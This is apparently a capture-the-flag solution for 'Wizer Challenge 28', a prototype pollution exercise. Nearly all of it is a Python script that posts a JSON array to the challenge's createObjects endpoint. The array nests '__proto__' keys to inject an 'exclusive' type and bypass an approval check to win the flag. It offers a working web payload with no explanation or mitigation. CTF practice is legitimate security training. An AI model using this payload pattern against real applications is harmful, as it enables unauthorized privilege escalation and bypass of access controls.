Wizer - Challenge 28 - Prototype Pollution

Exploit

import requests

url = "https://chal28-dhj578.vercel.app/api/createObjects"

# Create 1 exclusive object, 
# 1 exclusive object pending approval, 
# and 1 standard object to win the flag!

r = requests.post(url, json=[
    {
        "type":"standard"
    },
    {
        "__proto__": {
            "type": "exclusive"
        },
        "approved": "true"
    },
    {
        "__proto__": {
            "type": "exclusive"
        }
    }
])


print(r.text)